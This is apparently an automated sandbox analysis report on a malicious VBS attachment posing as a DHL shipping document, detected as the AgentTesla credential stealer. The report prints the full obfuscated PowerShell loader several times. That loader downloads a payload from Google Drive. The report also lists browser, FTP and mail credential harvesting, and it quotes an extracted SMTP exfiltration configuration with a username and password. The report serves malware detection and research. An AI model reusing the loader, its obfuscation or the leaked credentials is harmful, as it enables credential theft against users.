avisw subc9overt ';$intersessional=selvstarterens ' stal>tidsd ';$reproduktionsteknikkens=selvstarterens 'bygniicha me t.okx ,ned ';$guiding='scop124';spelean (selvstarterens 'virkssriddeejointtstave-smr.acfarmeocastrnregistfirmaemilten g.vetproev f,dst- verp jubbaperiotkrlhahtvrsk foreat,econ:forma\nedb,b bromicolles pre i.hotodsand,dhydraest,mmr ho,neha,mon.sthe.unurnt ilatxco tatalcon sylve-fu,dav b.gsaindbelapparuaars esabi ammo,$p,atrg nonruso ediextradsrgeri rabunb issgsigna;spe l ');spelean (selvstarterens ' .nneijave,fdeleg nonn(frit.t teksesocrasluft.tdani,-bead.pbalm,aquiritfi.enholymp nonnataton,:dechi\ aadsb rakiipredeshektai pjatdskrendprecieuund.rvolleebre snequip.egenpt ashlxensilt,here) ultr{ tromegunnaxpe muigements,gne}ethno;homes ');$dilamination = selvstarterens 'yunp e buttckonkahtkkesoneden komar% amma .alvperratpindhadkolleamesmetaarboaparap%konsu\cantoaobfuspbauxit rsenytod,icconnuhjde vu,heolsfuran.tabe.wpolsthembleimorbi trvej& k.nt& pro, algaregashacimpu,hbreako gte. coryb$ciliu ';spelean (selvstarterens 'reabs$ codeg jdinlregrao twi,bfdselaunco.l utru:ob,lsfunparoenkelrafslreopfunc sulfo pariufilm,nr.licsuranoesandol,nder=ingvo(staa.c quadmgeo.hdaft n pi.ds/ankomcrader brunl$ modid orsi jargln.outaba ekmkendei bensngastra ddsdtslingi ast.odushsnredhe).ikke ');spelean (selvstarterens ' konk$oncotgtiltalforudomodsvbhavega
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$tarboosh = 1;$ldreforvaltningen='substrin';$ldreforvaltningen+='g';function selvstarterens($journal){$nomadeinvasionens165=$journal.length-$tarboosh;for($effectible=5; $effectible -lt $nomadeinvasionens165; $effectible+=(6)){$lagringsformers+=$journal.$ldreforvaltningen.invoke($effectible, $tarboosh);}$lagringsformers;}function spelean($surmaster){. ($reproduktionsteknikkens) ($surmaster);}$uvelkomne=selvstarterens 'plummmskul opolerz,oliliovulalbestylvi.uiagen.e/bat.e5vandp. ouse0bas,e nove(antipw nyrei a.jenprv.tda.auaoaflgnw refospulve sty,knplysstdds y super1 renl0overb.weste0b ned; catu livrewacqueispeaknmyo,o6ran e4 sn g;luthe kintx rose6photo4bef t; odke algerrpimpsv feis: nge1eryth2south1 over.flag 0f,rce)debug amerig ,arserotuncfloppkkokleofysio/kopif2konom0tipti1lag.r0kalku0opret1s ksk0 a.cu1unspr turbfstfroiimpe.rwhor.ema sifunid,oland.xnonf /doket1sikke2vrang1 deci.mesom0 l,ee ';$yellowfish=selvstarterens 'g undudimmosaflire,onharincel- fradad.utog r.coe.orksn,erdethalen ';$ellokomotiv242=selvstarterens 'falkeh elvetadmirtsyge.pnyanls th.n:tugt / lepi/a.pasdsbr dr anchis kkevsuperefo.tm.breasgrarefo fonlo bageg capslbeforealkoh.granic,ejrsorecemmplate/ vaskuteknocr.llo?itczeerescuxelevap vulsoud,kardermatin si=epilodcrampoluksuw bortnt rmilaphelone gaa dtoed cams&nonadi glumdnoi.e=amill1skrivx quinc .nsvk kv.kkbro.hdslovalg nerkpupilk thuriboatljmortaghydrotkr,ptcsla p2fipsknv ndu2aands8hellehdruesjcatholslagt0u tral ask1det,c9intruuliderbaquavustenbxsl.ndjshove6 avisw subc9overt ';$intersessional=selvstarterens ' stal>tidsd ';$reproduktionsteknikkens=selvstarterens 'bygniicha me t.okx ,ned ';$guiding='scop124';spelean (selvstarterens 'virkssriddeejointtstave-smr.acfarmeocastrnregistfirmaemilten g.vetproev f,dst- verp jubbaperiotkrlhahtvrsk foreat,econ:forma\nedb,b bromicolles pre i.hotodsand,dhydraest,mmr ho,neha,mon.sthe.unurnt ilatxco tatalcon sylve-fu,dav b.gsaindbelapparuaars esabi ammo,$p,atrg nonruso ediextradsrgeri rabunb issgsigna;spe l ');spelean (selvstarterens ' .nneijave,fdeleg nonn(frit.t teksesocrasluft.tdani,-bead.pbalm,aquiritfi.enholymp nonnataton,:dechi\ aadsb rakiipredeshektai pjatdskrendprecieuund.rvolleebre snequip.egenpt ashlxensilt,here) ultr{ tromegunnaxpe muigements,gne}ethno;homes ');$dilamination = selvstarterens 'yunp e buttckonkahtkkesoneden komar% amma .alvperratpindhadkolleamesmetaarboaparap%konsu\cantoaobfuspbauxit rsenytod,icconnuhjde vu,heolsfuran.tabe.wpolsthembleimorbi trvej& k.nt& pro, algaregashacimpu,hbreako gte. coryb$ciliu ';spelean (selvstarterens 'reabs$ codeg jdinlregrao twi,bfdselaunco.l utru:ob,lsfunparoenkelrafslreopfunc sulfo pariufilm,nr.licsuranoesandol,nder=ingvo(staa.c quadmgeo.hdaft n pi.ds/ankomcrader brunl$ modid orsi jargln.outaba ekmkendei bensngastra ddsdtslingi ast.odushsnredhe).ikke ');spelean (selvstarterens ' konk$oncotgtiltalforudomodsvbhavega
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$tarboosh = 1;$ldreforvaltningen='substrin';$ldreforvaltningen+='g';function selvstarterens($journal){$nomadeinvasionens165=$journal.length-$tarboosh;for($effectible=5; $effectible -lt $nomadeinvasionens165; $effectible+=(6)){$lagringsformers+=$journal.$ldreforvaltningen.invoke($effectible, $tarboosh);}$lagringsformers;}function spelean($surmaster){. ($reproduktionsteknikkens) ($surmaster);}$uvelkomne=selvstarterens 'plummmskul opolerz,oliliovulalbestylvi.uiagen.e/bat.e5vandp. ouse0bas,e nove(antipw nyrei a.jenprv.tda.auaoaflgnw refospulve sty,knplysstdds y super1 renl0overb.weste0b ned; catu livrewacqueispeaknmyo,o6ran e4 sn g;luthe kintx rose6photo4bef t; odke algerrpimpsv feis: nge1eryth2south1 over.flag 0f,rce)debug amerig ,arserotuncfloppkkokleofysio/kopif2konom0tipti1lag.r0kalku0opret1s ksk0 a.cu1unspr turbfstfroiimpe.rwhor.ema sifunid,oland.xnonf /doket1sikke2vrang1 deci.mesom0 l,ee ';$yellowfish=selvstarterens 'g undudimmosaflire,onharincel- fradad.utog r.coe.orksn,erdethalen ';$ellokomotiv242=selvstarterens 'falkeh elvetadmirtsyge.pnyanls th.n:tugt / lepi/a.pasdsbr dr anchis kkevsuperefo.tm.breasgrarefo fonlo bageg capslbeforealkoh.granic,ejrsorecemmplate/ vaskuteknocr.llo?itczeerescuxelevap vulsoud,kardermatin si=epilodcrampoluksuw bortnt rmilaphelone gaa dtoed cams&nonadi glumdnoi.e=amill1skrivx quinc .nsvk kv.kkbro.hdslovalg nerkpupilk thuriboatljmortaghydrotkr,ptcsla p2fipsknv ndu2aands8hellehdruesjcatholslagt0u tral ask1det,c9intruuliderbaquavustenbxsl.ndjshove6 avisw subc9overt ';$intersessional=selvstarterens ' stal>tidsd ';$reproduktionsteknikkens=selvstarterens 'bygniicha me t.okx ,ned ';$guiding='scop124';spelean (selvstarterens 'virkssriddeejointtstave-smr.acfarmeocastrnregistfirmaemilten g.vetproev f,dst- verp jubbaperiotkrlhahtvrsk foreat,econ:forma\nedb,b bromicolles pre i.hotodsand,dhydraest,mmr ho,neha,mon.sthe.unurnt ilatxco tatalcon sylve-fu,dav b.gsaindbelapparuaars esabi ammo,$p,atrg nonruso ediextradsrgeri rabunb issgsigna;spe l ');spelean (selvstarterens ' .nneijave,fdeleg nonn(frit.t teksesocrasluft.tdani,-bead.pbalm,aquiritfi.enholymp nonnataton,:dechi\ aadsb rakiipredeshektai pjatdskrendprecieuund.rvolleebre snequip.egenpt ashlxensilt,here) ultr{ tromegunnaxpe muigements,gne}ethno;homes ');$dilamination = selvstarterens 'yunp e buttckonkahtkkesoneden komar% amma .alvperratpindhadkolleamesmetaarboaparap%konsu\cantoaobfuspbauxit rsenytod,icconnuhjde vu,heolsfuran.tabe.wpolsthembleimorbi trvej& k.nt& pro, algaregashacimpu,hbreako gte. coryb$ciliu ';spelean (selvstarterens 'reabs$ codeg jdinlregrao twi,bfdselaunco.l utru:ob,lsfunparoenkelrafslreopfunc sulfo pariufilm,nr.licsuranoesandol,nder=ingvo(staa.c quadmgeo.hdaft n pi.ds/ankomcrader brunl$ modid orsi jargln.outaba ekmkendei bensngastra ddsdtslingi ast.odushsnredhe).ikke ');spelean (selvstarterens ' konk$oncotgtiltalforudomodsvbhavega	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$tarboosh = 1;$ldreforvaltningen='substrin';$ldreforvaltningen+='g';function selvstarterens($journal){$nomadeinvasionens165=$journal.length-$tarboosh;for($effectible=5; $effectible -lt $nomadeinvasionens165; $effectible+=(6)){$lagringsformers+=$journal.$ldreforvaltningen.invoke($effectible, $tarboosh);}$lagringsformers;}function spelean($surmaster){. ($reproduktionsteknikkens) ($surmaster);}$uvelkomne=selvstarterens 'plummmskul opolerz,oliliovulalbestylvi.uiagen.e/bat.e5vandp. ouse0bas,e nove(antipw nyrei a.jenprv.tda.auaoaflgnw refospulve sty,knplysstdds y super1 renl0overb.weste0b ned; catu livrewacqueispeaknmyo,o6ran e4 sn g;luthe kintx rose6photo4bef t; odke algerrpimpsv feis: nge1eryth2south1 over.flag 0f,rce)debug amerig ,arserotuncfloppkkokleofysio/kopif2konom0tipti1lag.r0kalku0opret1s ksk0 a.cu1unspr turbfstfroiimpe.rwhor.ema sifunid,oland.xnonf /doket1sikke2vrang1 deci.mesom0 l,ee ';$yellowfish=selvstarterens 'g undudimmosaflire,onharincel- fradad.utog r.coe.orksn,erdethalen ';$ellokomotiv242=selvstarterens 'falkeh elvetadmirtsyge.pnyanls th.n:tugt / lepi/a.pasdsbr dr anchis kkevsuperefo.tm.breasgrarefo fonlo bageg capslbeforealkoh.granic,ejrsorecemmplate/ vaskuteknocr.llo?itczeerescuxelevap vulsoud,kardermatin si=epilodcrampoluksuw bortnt rmilaphelone gaa dtoed cams&nonadi glumdnoi.e=amill1skrivx quinc .nsvk kv.kkbro.hdslovalg nerkpupilk thuriboatljmortaghydrotkr,ptcsla p2fipsknv ndu2aands8hellehdruesjcatholslagt0u tral ask1det,c9intruuliderbaquavustenbxsl.ndjshove6 avisw subc9overt ';$intersessional=selvstarterens ' stal>tidsd ';$reproduktionsteknikkens=selvstarterens 'bygniicha me t.okx ,ned ';$guiding='scop124';spelean (selvstarterens 'virkssriddeejointtstave-smr.acfarmeocastrnregistfirmaemilten g.vetproev f,dst- verp jubbaperiotkrlhahtvrsk foreat,econ:forma\nedb,b bromicolles pre i.hotodsand,dhydraest,mmr ho,neha,mon.sthe.unurnt ilatxco tatalcon sylve-fu,dav b.gsaindbelapparuaars esabi ammo,$p,atrg nonruso ediextradsrgeri rabunb issgsigna;spe l ');spelean (selvstarterens ' .nneijave,fdeleg nonn(frit.t teksesocrasluft.tdani,-bead.pbalm,aquiritfi.enholymp nonnataton,:dechi\ aadsb rakiipredeshektai pjatdskrendprecieuund.rvolleebre snequip.egenpt ashlxensilt,here) ultr{ tromegunnaxpe muigements,gne}ethno;homes ');$dilamination = selvstarterens 'yunp e buttckonkahtkkesoneden komar% amma .alvperratpindhadkolleamesmetaarboaparap%konsu\cantoaobfuspbauxit rsenytod,icconnuhjde vu,heolsfuran.tabe.wpolsthembleimorbi trvej& k.nt& pro, algaregashacimpu,hbreako gte. coryb$ciliu ';spelean (selvstarterens 'reabs$ codeg jdinlregrao twi,bfdselaunco.l utru:ob,lsfunparoenkelrafslreopfunc sulfo pariufilm,nr.licsuranoesandol,nder=ingvo(staa.c quadmgeo.hdaft n pi.ds/ankomcrader brunl$ modid orsi jargln.outaba ekmkendei bensngastra ddsdtslingi ast.odushsnredhe).ikke ');spelean (selvstarterens ' konk$oncotgtiltalforudomodsvbhavega	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000009.00000002.2940602617.0000000022451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 2668, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000009.00000002.2940602617.0000000022451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 2668, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000009.00000002.2940602617.0000000022451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2940602617.000000002247B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 2668, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
114.142.162.17	mail.cash4cars.nz	Australia	133525	SERVERMULE-AS-APNimbus2PtyLtdAU	true
142.251.2.139	drive.google.com	United States	15169	GOOGLEUS	false
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
142.251.2.132	drive.usercontent.google.com	United States	15169	GOOGLEUS	false

Contacted Domains

Name	IP	Active
mail.cash4cars.nz	114.142.162.17	true
drive.google.com	142.251.2.139	true
drive.usercontent.google.com	142.251.2.132	true
api.ipify.org	104.26.13.205	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware

Found malware configuration

Source: conhost.exe.6720.2.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.cash4cars.nz", "Username": "logs@cash4cars.nz", "Password": "logs2024!"}

Multi AV Scanner detection for submitted file

Source: DHL Shipping doc.vbs

Virustotal: Detection: 14%

Perma Link

Source: unknown	HTTPS traffic detected: 142.251.2.139:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.139:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49740 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2122178024.0000000008500000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.2116646966.0000000007667000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000004.00000002.2116646966.0000000007706000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000004.00000002.2116646966.00000000076E2000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49741 -> 114.142.162.17:26

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 114.142.162.17 114.142.162.17
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SERVERMULE-AS-APNimbus2PtyLtdAU SERVERMULE-AS-APNimbus2PtyLtdAU

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1xCKkDLKkiJgTC2N28hjl0l19UbuxJ6w9&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
